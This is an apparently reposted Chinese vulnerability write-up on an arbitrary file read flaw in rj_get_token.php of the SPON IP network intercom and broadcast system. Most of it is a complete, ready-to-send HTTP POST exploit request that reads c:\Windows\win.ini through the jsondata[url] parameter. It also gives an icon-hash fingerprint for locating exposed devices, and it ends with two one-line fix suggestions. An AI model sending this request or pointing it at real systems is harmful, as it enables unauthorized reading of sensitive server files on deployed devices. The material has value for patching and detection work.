產(chǎn)品介紹
世邦通信SPON IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)采用領(lǐng)先的IPAudio?技術(shù),將音頻信號(hào)以數(shù)據(jù)包形式在局域網(wǎng)和廣域網(wǎng)上進(jìn)行傳送,是一套純數(shù)字傳輸系統(tǒng)。
漏洞描述
spon IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)rj_get_token.php存在任意文件讀取漏洞,攻擊者可通過(guò)該漏洞在服務(wù)器端讀取任意敏感文件。
資產(chǎn)測(cè)繪
icon_hash=“-1830859634”
漏洞復(fù)現(xiàn)
POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
jsondata[url]=c:\Windows\win.ini
讀取win.ini配置文件內(nèi)容文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-822174.html
修復(fù)建議
1、升級(jí)至最新安全版本。
2、限制接口訪問(wèn)。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-822174.html
到了這里,關(guān)于世邦通信SPON IP網(wǎng)絡(luò)對(duì)講廣播系統(tǒng)rj_get_token.php 任意文件讀取漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!